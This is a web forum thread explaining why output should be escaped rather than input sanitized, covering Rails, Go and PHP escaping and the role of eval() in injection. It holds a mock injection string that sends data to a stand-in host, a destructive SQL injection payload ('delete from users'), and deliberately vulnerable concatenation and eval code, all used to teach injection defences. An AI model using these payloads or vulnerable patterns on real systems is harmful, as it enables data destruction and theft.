6 votes

Don’t try to sanitize input. Escape output

21 comments

  1. skybrian
    Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one.

    There are times when you don't want to escape something (because it comes from a trusted source), and then it's best to have a static type indicating that it's trusted. For example, Go's html/template package has a template.HTML type for this.
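
    Here is a minimal sketch of that idea in JavaScript, under some assumptions. JavaScript has no static types, so a hypothetical TrustedHtml wrapper class, checked at runtime, stands in for something like Go's template.HTML. The render() function is a toy {{placeholder}} substitution, not any real template engine. Every value is escaped unless it has been explicitly wrapped.

```javascript
// Hypothetical sketch: escape-by-default rendering with an explicit "trusted" wrapper.
// TrustedHtml plays the role a type like Go's template.HTML plays; it is not a real library API.
class TrustedHtml {
  constructor(markup) {
    this.markup = markup; // the caller vouches that this markup is safe
  }
}

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first so the entities added below aren't re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Replaces {{key}} placeholders; every value is escaped unless it is a TrustedHtml.
function render(template, values) {
  return template.replace(/\{\{(\w+)\}\}/g, (_, key) => {
    const value = values[key];
    return value instanceof TrustedHtml ? value.markup : escapeHtml(value);
  });
}

const page = render("<p>Hello, {{name}}!</p>{{footer}}", {
  name: '<script>alert("x")</script>',
  footer: new TrustedHtml("<footer>Static site footer</footer>"),
});
console.log(page);
// <p>Hello, &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;!</p><footer>Static site footer</footer>
```

    In TypeScript or Go the same distinction could be enforced by the compiler instead of an instanceof check.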

    6 votes
  2. teaearlgraycold
    Rails does a great job with this. It monkey-patches the String class in the context of controllers, views, etc. so that strings are treated as HTML-unsafe by default. Every single string that gets interpolated into a template has its HTML escaped unless you override that behavior with the #html_safe method.

    It's a perfect solution because you don't need to know anything about it, and you get the most secure behavior by default. If you really do want to inline raw HTML, you'll see right away that it's being escaped, and you override the default only in that one specific case.
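
    Roughly how that default could look in JavaScript, as a sketch rather than a description of how Rails is implemented: SafeString, htmlSafe() and the html tagged template are hypothetical names. Interpolated values are escaped unless they were marked safe, and a template's own result is marked safe, so nesting one template inside another doesn't double-escape it.

```javascript
// Hypothetical sketch of Rails-style "unsafe by default" strings in JavaScript.
// SafeString, htmlSafe and html are illustrative names, not a real library.
class SafeString {
  constructor(value) {
    this.value = value;
  }
  toString() {
    return this.value;
  }
}

// Explicit opt-out, analogous to calling #html_safe on one specific string.
const htmlSafe = (value) => new SafeString(String(value));

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Tagged template: interpolated values are escaped unless already marked safe.
// The result is itself marked safe, so nested templates aren't escaped twice.
function html(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    out += value instanceof SafeString ? value.value : escapeHtml(value);
    out += strings[i + 1];
  });
  return new SafeString(out);
}

const comment = 'I <3 "Rails" & ERB';
const item = html`<li>${comment}</li>`;
const list = html`<ul>${item}${htmlSafe("<li><em>raw</em></li>")}</ul>`;
console.log(String(list));
// <ul><li>I &lt;3 &quot;Rails&quot; &amp; ERB</li><li><em>raw</em></li></ul>
```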

    5 votes
  3. ThatFanficGuy
    So, what happens if my name is John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite) and your input lacks sanitization?

    2 votes
    1. Artemix
      As input, this won't hurt, except if you do something shady like an exec().

      As output, well, that's where you're supposed to escape.
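
      A small sketch of what escaping on output means in practice, assuming a Map as a stand-in for storage and a made-up sample value: the input is stored exactly as typed, and each output context gets its own encoding. This is also why sanitizing once at input can't work: no single transformation is right for HTML, JavaScript and URLs at the same time. (Caveat: JSON.stringify output placed inside an HTML script element needs extra care with sequences like </script>.)

```javascript
// Sketch: store input verbatim, encode it only when writing it into a specific context.
// The Map "storage" and the sample value are illustrative assumptions.
const storage = new Map();
storage.set("name", `John "Jo" O'Neil <b>`); // no sanitizing on the way in

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // first, so the entities added below aren't re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const raw = storage.get("name");

// The same data, encoded three different ways depending on where it is written:
const asHtml = escapeHtml(raw);            // HTML text or a quoted attribute value
const asJsLiteral = JSON.stringify(raw);   // a string literal in generated JavaScript
const asUrlPart = encodeURIComponent(raw); // a URL query parameter value

console.log(asHtml);      // John &quot;Jo&quot; O&#39;Neil &lt;b&gt;
console.log(asJsLiteral); // "John \"Jo\" O'Neil <b>"
console.log(asUrlPart);   // John%20%22Jo%22%20O'Neil%20%3Cb%3E
```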

      3 votes
      1. ThatFanficGuy
        How is "escaping unsanitized input to execute arbitrary code" not harmful?

        1 vote
        1. Deimos
          What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code.

          The only way that happens is if it gets run through something like exec() (and why would you do that with a name?), or if it's output in a context where a browser can interpret it as JavaScript (which is where you need to make sure to escape it before doing so).

          6 votes
          1. ThatFanficGuy
            Unless I'm missing something, it's a snippet of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.

            1 vote
            1. Deimos
              It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.

              8 votes
              1. ThatFanficGuy
                Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no?

                user fills the form → name gets set with var name = <user_input_here> → code extravaganza

                1 vote
                1. wirelyre
                  Please forgive some philosophy.

                  "Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding.


                  When a sequence of characters stays within an environment (like your web browser) nothing special happens. Your web browser holds a mini document for every text field, which it updates when you type into it. The browser is able to do this because it conceives of strings in a very abstract sense.

                  When we write var addressee = givenName + " " + surname; we aren't really concerned about the quote characters in the middle. Instead we think abstractly about three separate strings: givenName and surname, which are already sequences of characters, and " ", which we have just summoned into the computer. Once they're all there, you and I can think about them however we want, but all the computer knows is "givenName is a list of numbers, which are 69, 109, 105, 108, 121, representing a string".

                  The JavaScript engine stopped caring about quote characters right after it executed " ". Quote characters are just an incantation to conjure strings into your browser.
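
                  A quick way to see this in a JavaScript console (the five numbers above happen to spell "Emily"): the parsed string holds only character codes, and different quote spellings in the source produce the very same string.

```javascript
// Sketch: after parsing, a string is only a sequence of character codes.
const givenName = "Emily";
const codes = Array.from(givenName, (ch) => ch.charCodeAt(0));
console.log(codes.join(", ")); // 69, 109, 105, 108, 121

// Three different source spellings of the double-quote character...
const a = "\"";                    // escaped inside double quotes
const b = '"';                     // unescaped inside single quotes
const c = String.fromCharCode(34); // built from its code, with no string literal at all
// ...all produce the identical one-character string.
console.log(a === b && b === c); // true
```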


                  Similarly, a SQL engine running SELECT given_name from person WHERE surname = 'Murphy'; first transforms that command into an internal representation, then runs it.

                  At issue is the transformation from plain text into internal forms. Data at rest is perfectly safe.

                  If plain text is the interface from my web server to my database, then I have to produce plain text that conjures the right data into the database when the database program interprets that text.


                  As you have figured out, "injection" is when you make me emit plain text that she misunderstands.

                  But when you type into your JavaScript console, you interact with an extra interface! That's not an injection because that interface doesn't usually exist. If you write into a form field in your browser, that input materializes in memory without any escaping at all. It lives there and means nothing more than "a sequence of bytes" unless someone tries to run it ― to decode it.

                  So here's the question: what can you do to trick me into making bad text for her? The answer probably doesn't include executing JavaScript on your own computer, because you don't have to treat your own browser as a black box: you control it already. In other words, you're trying to trick yourself, not me.

                  Instead you have to somehow subvert my interface for her.
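
                  A sketch of the same idea with JSON text as the interface between "me" and "her"; the record shape and the crafted name are made up for illustration. Pasting raw characters into the text lets the receiver decode something the sender never meant, while encoding with JSON.stringify round-trips the data exactly.

```javascript
// Sketch: injection = emitting text the receiver decodes differently than intended.
// The record shape and the crafted name are made up for illustration.
const givenName = 'Jo", "admin": true, "x": "';

// Naive: paste raw characters into the JSON text.
const naiveText = '{"admin": false, "name": "' + givenName + '"}';
const misread = JSON.parse(naiveText); // the later duplicate "admin" key wins
console.log(misread.admin); // true

// Encoded: JSON.stringify escapes the quotes for this particular interface.
const encodedText = JSON.stringify({ admin: false, name: givenName });
const decoded = JSON.parse(encodedText);
console.log(decoded.admin);              // false
console.log(decoded.name === givenName); // true
```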

                  4 votes
                  1. ThatFanficGuy
                    Damn. That's a nice overview, in human language. I appreciate that.

                    I think my problem was that I misunderstood the role of a quotation mark in the code. I assumed it was meaningful on its own (within the confines of, say, JS) because that's a language I, as a web dev, have to converse in. That appears not to be the case, given that the browser happily stores the " character as itself without breaking the compiler and its effort to keep the code sane.

                    "A sequence of bytes" makes more sense than "a string" in its interface sense.

                    2 votes
                2. tildez
                  <user_input_here> would still be a string. Unless you tell your program to execute that string as code, it's gonna stay as a string.
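
                  To illustrate in JavaScript (userInput is a stand-in for a text field's value, holding a payload like the one at the top of the thread): a plain assignment copies the characters and nothing else, so the "injected" declaration never runs.

```javascript
// Sketch: a form value containing quotes and semicolons is still just a string.
// userInput stands in for a text field's value (assumption: no real form here).
const userInput = `John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite)`;

const storedName = userInput; // copies the characters; nothing is parsed or run

console.log(typeof storedName);        // string
console.log(storedName === userInput); // true
console.log(typeof maliciousSite);     // undefined: the "injected" declaration never ran
```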

                  2 votes
                  1. ThatFanficGuy
                    Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code...

                    ...Imma test it out tomorrow.

                    1. Deimos
                      I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject JavaScript into this comment, but nothing will happen because it's not being executed:

                      alert("test");

                      That's perfectly valid JavaScript and it's not escaped or sanitized in any way, but it's not in a place where JavaScript code gets executed, so it doesn't do anything. It's just text that happens to also be code. That's why the more important part of a JavaScript injection into a website is finding a way to inject something the browser will execute, such as a <script> tag, because that's what causes the execution.

                      Here's how a "typical" SQL injection vulnerability happens:

                      query = "select * from users where username = '" + name + "';"
                      result = database.execute(query)
                      

                      If someone has control of the name variable's value (because it comes from a web query variable or something similar) with code like that, they can set it to something like you showed, like:

                      '; delete from users; select '1
                      

                      Now, when that value gets included in the query by the code above, the SQL that ends up getting executed is:

                      select * from users where username = ''; delete from users; select '1';
                      

                      So the entire users table gets deleted. But again, the key point is that they injected SQL into a place that would be executed as SQL. If they had put some JavaScript into name instead, nothing would have happened, because it's being executed as SQL, not JavaScript.
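
                      The example above can be reproduced without a database by only building the query text. The sqlStringLiteral() helper is hypothetical and follows standard SQL's rule of doubling embedded single quotes; some engines (MySQL, by default) also treat backslashes as escapes, so real code should use the driver's parameterized queries rather than hand-rolled escaping.

```javascript
// Sketch: string concatenation lets data become SQL; literal escaping keeps it data.
// No database is involved here; we only build the query text.
const name = "'; delete from users; select '1";

// Vulnerable: raw characters pasted into SQL text.
const query = "select * from users where username = '" + name + "';";
console.log(query);
// select * from users where username = ''; delete from users; select '1';

// Hypothetical helper: a standard SQL string literal doubles every embedded single quote.
function sqlStringLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}

const safeQuery = "select * from users where username = " + sqlStringLiteral(name) + ";";
console.log(safeQuery);
// select * from users where username = '''; delete from users; select ''1';
```

                      In the second query the whole value, quotes and semicolons included, sits inside one string literal, so the database compares it against usernames instead of running it.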

                      So for something like you originally posted (John ˋ"'; ...) to work as an exploit, it has to go somewhere that it will eventually be executed as JavaScript. That would only happen in form-handling code if it was doing something crazy like this:

                      var nameValue = document.getElementById("name").value;
                      var code = "var name = '" + nameValue + "';";
                      eval(code);
                      

                      But (hopefully) nobody would ever do that. They'd just do var name = nameValue; directly, and then nothing can happen, because nothing is being executed; a variable is just being set to the value. Again, the execution (which in this case is the eval() call) is the key factor. If the value never reaches eval() or a similar construct that runs strings as code, there's no possible exploit.
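
                      A runnable version of that contrast, as a sketch: nameValue stands in for document.getElementById("name").value since there is no DOM here, and the log array only records whether injected code ran. Only the eval() of concatenated source executes the payload; encoding the value with JSON.stringify first keeps it data even under eval(). Constructs such as new Function behave like eval() in this respect.

```javascript
// Sketch: the exploit needs eval(); the characters alone do nothing.
// nameValue stands in for document.getElementById("name").value (no DOM here).
const nameValue = "x'; log.push('injected code ran'); '";
const log = []; // records whether any injected statement executed

// 1. Plain assignment: the value is just data.
const nameCopy = nameValue;
console.log(log.length); // 0

// 2. Pasting the value into source text and eval-ing it: the quote ends the literal early.
eval("var name2 = '" + nameValue + "';");
console.log(log.length); // 1: the injected log.push ran

// 3. Encoding the value as a proper string literal first keeps it data, even under eval.
const roundTrip = eval(JSON.stringify(nameValue));
console.log(roundTrip === nameValue); // true
console.log(log.length); // still 1
```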

                      Does that make sense?

                      6 votes
                        1. ThatFanficGuy
                        No, because it glosses over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're saying "it won't do the thing because that's how you would do it", and nothing about why you'd have to do it this way.

                        I did some testing. The results are as follows. I tried to inject an entirely-new variable (here is the entire test base I used). What it ended up doing was perfectly encapsulating the string that I thought would easily escape: you can see that the " quotation mark is considered part of the string, even though the string is also using quotation marks to delimit strings. If it does that with any entered text, sure, you can't escape something the way I thought you could... but why?

                        The way I see it, it should work – and I think it probably does work with lower-level languages – but doesn't here.

                        2 votes
                          1. Apos
                          You don't see escape characters. Try with console.log(JSON.stringify(name));

                          Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.
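
                            To see the difference in a console (the sample value is made up): JSON.stringify() shows how the string would be written as source code, backslashes included, but the stored string itself contains no backslashes at all.

```javascript
// Sketch: escapes exist only in source text; the stored string has none.
const formValue = 'John "Jo" Smith'; // hypothetical form value containing double quotes

console.log(formValue);                        // John "Jo" Smith
console.log(JSON.stringify(formValue));        // "John \"Jo\" Smith"
console.log(formValue.includes("\\"));         // false: no backslash is stored
console.log(formValue.length);                 // 15
console.log(JSON.stringify(formValue).length); // 19: two outer quotes plus two backslashes
```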

                          4 votes
                            1. ThatFanficGuy
                            So there is escaping. I was fucking right all the time.

                            I feel like a goddamn prophet now, even though none of this shit really matters. :D

                            1 vote
                            1. Apos
                              Didn't follow the full conversation, but nice!

                              Edit: Actually, you're both right.

                              Instead, try this:

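                              var name = "var name = \"John\"; var rate = 100;";
                              console.log(name);        // var name = "John"; var rate = 100;
                              console.log(typeof rate); // undefined: rate doesn't exist yet (console.log(rate) would throw)
                              eval(name);               // now the string is run as code
                              console.log(name);        // John
                              console.log(rate);        // Now it has a value: 100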
                              

                              Without the eval, it's pretty hard to execute the code stored in a string. And strings from textboxes are auto escaped because otherwise they wouldn't be valid string types.

                              Edit2: Actually /u/Deimos is most likely right about the strings not being escaped. In the context of the source code, you need to escape for the parser to understand what's going on. Once the parser has gone over the string though, it doesn't need to hold on to the escape character \.

                              So really, to execute the string as code, you need the interpreter to evaluate the string.

                              5 votes
  4. just_a_salmon
    I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their &#xx equivalents and you’re good. I don’t think encoding matters here, as most things don’t interpret look-alikes.
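
    What that looks like as code, as a sketch: the five characters below and their numeric references are the usual minimal set for element text and quoted attribute values. Other contexts, such as script blocks, unquoted attributes, or URLs, need different encoding.

```javascript
// Sketch: HTML escaping by replacing a handful of characters with numeric character references.
// Assumption: output goes into element text or quoted attribute values only.
const REFERENCES = {
  "&": "&#38;",
  "<": "&#60;",
  ">": "&#62;",
  '"': "&#34;",
  "'": "&#39;",
};

function escapeHtml(text) {
  // A single pass, so an "&" produced by one replacement is never re-escaped.
  return String(text).replace(/[&<>"']/g, (ch) => REFERENCES[ch]);
}

console.log(escapeHtml(`<img src=x onerror="alert('hi')">`));
// &#60;img src=x onerror=&#34;alert(&#39;hi&#39;)&#34;&#62;
```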

    2 votes
    1. Artemix
      That's the point of the article, and most languages and template engines do provide an escape mechanism.

      For example, in PHP, the htmlspecialchars() function does a great job of escaping.

      3 votes
    2. skybrian
      It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in the early days of the web, it was common to use print statements or a template language that's not HTML-specific, and then the programmer has to remember to do the escaping every time they print something.

      3 votes